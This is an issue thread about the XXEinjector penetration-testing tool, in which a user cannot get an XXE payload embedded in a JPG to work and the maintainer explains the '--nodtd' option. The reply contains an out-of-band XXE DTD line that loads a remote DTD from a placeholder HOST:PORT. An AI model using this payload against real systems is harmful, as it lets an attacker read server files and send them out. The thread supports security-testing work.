Support images with payload

Question

Support images with payload

JonathanJonathanJonathan opened this issue 6 years ago · 1 comments

JonathanJonathanJonathan commented 6 years ago

I'm trying to perform an attack where a JPG contains the XXE payload. If I manually submit the picture it works, however XXEinjector fails:

/usr/share/ruby/uri/common.rb:331:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
        from /usr/share/ruby/uri/common.rb:331:in `unescape'
        from /usr/share/ruby/uri/common.rb:649:in `unescape'
        from XXEinjector.rb:370:in `block in configreq'
        from XXEinjector.rb:366:in `loop'
        from XXEinjector.rb:366:in `configreq'
        from XXEinjector.rb:1051:in `<main>'

I tried converting the request file to UTF-8, after that the tool performs an attack, but no connection to my server is made.

What should I do different? Do you have a working example request that uses images?

Example Request:
req-example.txt

Example XXE JPG:

Keep up the good work, thanks! :)

Answer 1 · 2018-07-26T05:40:21.000Z

Hello,

For such situations I have implemented "--nodtd" switch. Then tool does not look for injection point but just sends request as it is to the server. In this case you need to specify correct DTD in your request by yourself.
You can see how it should look like using "--dtd" (replace only HOST and PORT):
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://HOST:PORT/file.dtd">%remote;%int;%trick;]>

Using "--nodtd" XXEinjector still waits for reverse connection and does automatic retrieval but it only skips automatic DTD injection part.

Please try and let me know if it works. If so please close the issue.